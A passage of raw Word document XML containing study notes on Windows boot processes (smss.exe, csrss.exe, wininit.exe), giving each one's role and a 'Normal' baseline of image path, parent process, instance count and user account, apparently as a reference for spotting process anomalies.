        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C344FC2" w14:textId="1238DCF6" w:rsidR="004C4221" w:rsidRPr="004C4221" w:rsidRDefault="004C4221" w:rsidP="004C4221">
      <w:r>
        <w:tab/>
        <w:t>(initiated By System)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CFA8A7" w14:textId="26C09577" w:rsidR="009134EF" w:rsidRDefault="009134EF" w:rsidP="00FF4CB0">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="009134EF">
        <w:t xml:space="preserve">known as the Windows Session Manager, is responsible for </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3154">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>creating new sessions</w:t>
      </w:r>
      <w:r w:rsidR="00FF4CB0">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00FF4CB0" w:rsidRPr="00FF4CB0">
        <w:t>self-terminates itself</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009134EF">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009134EF">
        <w:t>It is the first user-mode process started by the kernel</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2D0BE3" w14:textId="3AB3E285" w:rsidR="009134EF" w:rsidRDefault="009134EF" w:rsidP="009134EF">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Smss.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="009134EF">
        <w:t xml:space="preserve"> process starts the kernel and user modes of the </w:t>
      </w:r>
      <w:r w:rsidRPr="009134EF">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Windows subsystem</w:t>
      </w:r>
      <w:r w:rsidRPr="009134EF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">this </w:t>
      </w:r>
      <w:r w:rsidRPr="009134EF">
        <w:t xml:space="preserve">subsystem includes </w:t>
      </w:r>
      <w:r w:rsidRPr="009134EF">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>win32k.sys</w:t>
      </w:r>
      <w:r w:rsidRPr="009134EF">
        <w:t xml:space="preserve"> (kernel mode), </w:t>
      </w:r>
      <w:r w:rsidRPr="009134EF">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>winsrv.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="009134EF">
        <w:t xml:space="preserve"> (user mode), and </w:t>
      </w:r>
      <w:r w:rsidRPr="009134EF">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>csrss.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="009134EF">
        <w:t xml:space="preserve"> (user mode).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5313149F" w14:textId="56B8ED3C" w:rsidR="009134EF" w:rsidRDefault="00D44578" w:rsidP="00D44578">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44578">
        <w:t xml:space="preserve">Smss.exe starts </w:t>
      </w:r>
      <w:r w:rsidRPr="00D44578">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve">csrss.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="00D44578">
        <w:t xml:space="preserve">(Windows subsystem) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D44578">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve">wininit.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="00D44578">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="00D44578">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>Session 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44578">
        <w:t>isolated Windows session for the operating system</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44578">
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D44578">
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t xml:space="preserve">csrss.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="00D44578">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D44578">
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t xml:space="preserve">winlogon.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="00D44578">
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D44578">
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>Session 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44578">
        <w:t>, which is the user session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0711DA5D" w14:textId="043B93F5" w:rsidR="00DF3154" w:rsidRDefault="00DF3154" w:rsidP="00DF3154">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF3154">
        <w:t>SMSS is also responsible for creating environment variables, virtual memory paging files and starts winlogon.exe (the Windows Logon Manager).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB14800" w14:textId="7ADF73DD" w:rsidR="00EF69A5" w:rsidRDefault="00EF69A5" w:rsidP="00DF3154">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Any Process smss.exe will initiate, the created process parent will be not found Bec </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will terminate itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1085EB22" w14:textId="3F5FCBF7" w:rsidR="009134EF" w:rsidRDefault="00F21C4D" w:rsidP="009134EF">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Normal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F437F4" w14:textId="49D5FDB3" w:rsidR="00F21C4D" w:rsidRPr="00F21C4D" w:rsidRDefault="00F21C4D" w:rsidP="00F21C4D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F21C4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Image Path</w:t>
      </w:r>
      <w:r w:rsidRPr="00F21C4D">
        <w:t>: %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F21C4D">
        <w:t>SystemRoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F21C4D">
        <w:t>%\System32\smss.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6913536B" w14:textId="1D183ED0" w:rsidR="00F21C4D" w:rsidRPr="00F21C4D" w:rsidRDefault="00F21C4D" w:rsidP="00F21C4D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F21C4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parent Process: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F21C4D">
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidR="005E6DEF">
        <w:t xml:space="preserve"> (with PID 4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25743086" w14:textId="4325B13B" w:rsidR="00F21C4D" w:rsidRPr="00F21C4D" w:rsidRDefault="00F21C4D" w:rsidP="00F21C4D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F21C4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Number of Instances: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F21C4D">
        <w:t>One master instance and child instance per</w:t>
      </w:r>
      <w:r w:rsidRPr="00F21C4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F21C4D">
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F21C4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F21C4D">
        <w:rPr>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>The child instance exists after creating the session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F21C4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545F907C" w14:textId="0DA7CB09" w:rsidR="00F21C4D" w:rsidRPr="00066662" w:rsidRDefault="00F21C4D" w:rsidP="00066662">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F21C4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User Account: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F21C4D">
        <w:t>Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4819C55F" w14:textId="77777777" w:rsidR="0088613E" w:rsidRPr="001F076A" w:rsidRDefault="0088613E" w:rsidP="001F076A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C9A305E" w14:textId="5ADFCC99" w:rsidR="009134EF" w:rsidRDefault="00D479DF" w:rsidP="00D027F7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D027F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>csrss.exe (Client Server Runtime Process)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B4E29A" w14:textId="0A9B113F" w:rsidR="001C6C48" w:rsidRPr="001C6C48" w:rsidRDefault="001C6C48" w:rsidP="001C6C48">
      <w:r>
        <w:tab/>
        <w:t>(Initiated by smss</w:t>
      </w:r>
      <w:r w:rsidR="00AF40ED">
        <w:t>.exe</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3533F47B" w14:textId="4FD76E3D" w:rsidR="00DF3154" w:rsidRDefault="00DF3154" w:rsidP="00DF3154">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Instance in Session 0 &amp; Session 1, it is </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3154">
        <w:t>user-mode side of the Windows subsystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641C808C" w14:textId="2F71AE3D" w:rsidR="00DF3154" w:rsidRPr="00DF3154" w:rsidRDefault="00DF3154" w:rsidP="00DF3154">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF4CB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF4CB0">
        <w:t>: csrss.exe and winlogon.exe are called from smss.exe at startup for Session 1.</w:t>
      </w:r>
      <w:r w:rsidR="00066662">
        <w:t xml:space="preserve"> Then smss.exe will terminate itself so this process Parent may be Not Exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423E8F1E" w14:textId="3C0F9B64" w:rsidR="009134EF" w:rsidRDefault="00FF4CB0" w:rsidP="00FF4CB0">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF4CB0">
        <w:t xml:space="preserve">responsible for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3154">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>Win32 console</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3154">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF4CB0">
        <w:t xml:space="preserve">window and process </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3154">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>thread creation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3154">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF4CB0">
        <w:t>and deletion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF4CB0">
        <w:t>critical to system operation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shouldn’t corrupted, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF4CB0">
        <w:t xml:space="preserve">responsible for making the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF3154">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>Windows API</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF4CB0">
        <w:t> available to other processes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DFBFEB" w14:textId="58882A0A" w:rsidR="00FF4CB0" w:rsidRDefault="00FF4CB0" w:rsidP="00FF4CB0">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Normal</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF4CB0">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266B161A" w14:textId="4788308D" w:rsidR="00FF4CB0" w:rsidRPr="00FF4CB0" w:rsidRDefault="00FF4CB0" w:rsidP="00FF4CB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4CB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Image Path: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF4CB0">
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF4CB0">
        <w:t>SystemRoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF4CB0">
        <w:t>%\System32\csrss.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753BB364" w14:textId="0E860C07" w:rsidR="00FF4CB0" w:rsidRPr="00FF4CB0" w:rsidRDefault="00FF4CB0" w:rsidP="00FF4CB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4CB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parent Process: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF4CB0">
        <w:t>Created by an instance of smss.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5DFC44" w14:textId="175E0F84" w:rsidR="00FF4CB0" w:rsidRPr="00FF4CB0" w:rsidRDefault="00FF4CB0" w:rsidP="00FF4CB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4CB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Number of Instances: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF4CB0">
        <w:t>Two or more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A376C6" w14:textId="3FCC3019" w:rsidR="00FF4CB0" w:rsidRPr="00FF4CB0" w:rsidRDefault="00FF4CB0" w:rsidP="00FF4CB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4CB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User Account: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF4CB0">
        <w:t>Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08105B01" w14:textId="1DDCEF11" w:rsidR="00FF4CB0" w:rsidRPr="00FF4CB0" w:rsidRDefault="00FF4CB0" w:rsidP="00FF4CB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4CB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Start Time: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF4CB0">
        <w:t>Within seconds of boot time for the first two instances (for Session 0 and 1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7410F91D" w14:textId="767FFD5E" w:rsidR="00FF4CB0" w:rsidRDefault="00FF4CB0" w:rsidP="00FF4CB0">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="497519E3" w14:textId="2F9B7D90" w:rsidR="00B9714C" w:rsidRDefault="001920A9" w:rsidP="00D027F7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D027F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wininit.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00B9714C" w:rsidRPr="00D027F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Initialization Process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4843F2B3" w14:textId="4600401C" w:rsidR="001C6C48" w:rsidRPr="001C6C48" w:rsidRDefault="001C6C48" w:rsidP="001C6C48">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>(Initiated by smss</w:t>
      </w:r>
      <w:r w:rsidR="00AF40ED">
        <w:t>.exe</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C317F8" w14:textId="21A82099" w:rsidR="00B9714C" w:rsidRDefault="00B9714C" w:rsidP="00B9714C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9714C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">esponsible for launching </w:t>
      </w:r>
      <w:r w:rsidRPr="00B9714C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve">services.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="00B9714C">
        <w:t>(Service Control Manager),</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9714C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B9714C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve">lsass.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="00B9714C">
        <w:t>(Local Security Authority</w:t>
      </w:r>
      <w:r w:rsidR="00582FB5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00582FB5" w:rsidRPr="00582FB5">
        <w:t>Subsystem Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9714C">
        <w:t>), and</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9714C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B9714C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>lsaiso.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9714C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> within Session 0. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6770E0BE" w14:textId="298C2855" w:rsidR="009134EF" w:rsidRDefault="00B9714C" w:rsidP="00B9714C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9714C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>runs in the background with its child processes. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9F54CF" w14:textId="67376630" w:rsidR="00B9714C" w:rsidRDefault="00B9714C" w:rsidP="00B9714C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00B9714C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r w:rsidRPr="00582FB5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lsaiso.exe</w:t>
      </w:r>
      <w:r w:rsidR="00582FB5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00582FB5" w:rsidRPr="00582FB5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LSA Isolated</w:t>
      </w:r>
      <w:r w:rsidR="00582FB5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9714C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00582FB5">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00582FB5" w:rsidRPr="00582FB5">
        <w:t>process responsible for securely storing and managing credentials when Credential Guard is enabled.</w:t>
      </w:r>
      <w:r w:rsidR="00582FB5">
        <w:t xml:space="preserve"> It </w:t>
      </w:r>
      <w:r w:rsidR="00582FB5" w:rsidRPr="00582FB5">
        <w:t>Replaces the traditional</w:t>
      </w:r>
      <w:r w:rsidR="00582FB5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00582FB5" w:rsidRPr="00582FB5">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>lsass.exe</w:t>
      </w:r>
      <w:r w:rsidR="00582FB5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">”. lsaiso.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="00B9714C">
        <w:t xml:space="preserve">is a process associated with Credential Guard and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B9714C">
        <w:t>KeyGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B9714C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00582FB5">
        <w:t xml:space="preserve">May Not See it if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00582FB5">
        <w:t>KeyGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00582FB5">
        <w:t xml:space="preserve"> is not enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657AF721" w14:textId="54C59FEF" w:rsidR="00582FB5" w:rsidRPr="00582FB5" w:rsidRDefault="00582FB5" w:rsidP="00582FB5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00582FB5">
        <w:t>Credential Guard is a security feature in Windows helps protect user credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ABE266" w14:textId="1AA6875F" w:rsidR="00B9714C" w:rsidRDefault="00D027F7" w:rsidP="00B9714C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Normal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADA50EA" w14:textId="7EE45691" w:rsidR="00D027F7" w:rsidRPr="00D027F7" w:rsidRDefault="00D027F7" w:rsidP="00D027F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D027F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Image Path: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D027F7">
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D027F7">
        <w:t>SystemRoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D027F7">
        <w:t>%\System32\wininit.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345EF441" w14:textId="1518A9CA" w:rsidR="00D027F7" w:rsidRPr="00D027F7" w:rsidRDefault="00D027F7" w:rsidP="00D027F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D027F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parent Process: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D027F7">
        <w:t>Created by an instance of smss.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CD33E3" w14:textId="3ED88FFD" w:rsidR="00D027F7" w:rsidRPr="00D027F7" w:rsidRDefault="00D027F7" w:rsidP="00D027F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D027F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Number of Instances: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D027F7">
        <w:t>One</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104C4FE1" w14:textId="3D1DE4A0" w:rsidR="00D027F7" w:rsidRPr="00D027F7" w:rsidRDefault="00D027F7" w:rsidP="00D027F7">
      <w:pPr>
